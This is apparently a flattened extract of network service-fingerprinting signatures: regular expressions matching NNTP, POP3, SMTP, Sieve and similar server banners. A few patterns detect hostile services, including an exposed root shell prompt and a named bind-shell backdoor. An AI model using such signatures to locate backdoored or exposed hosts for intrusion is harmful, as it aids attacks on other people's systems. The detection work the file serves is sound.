+\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not 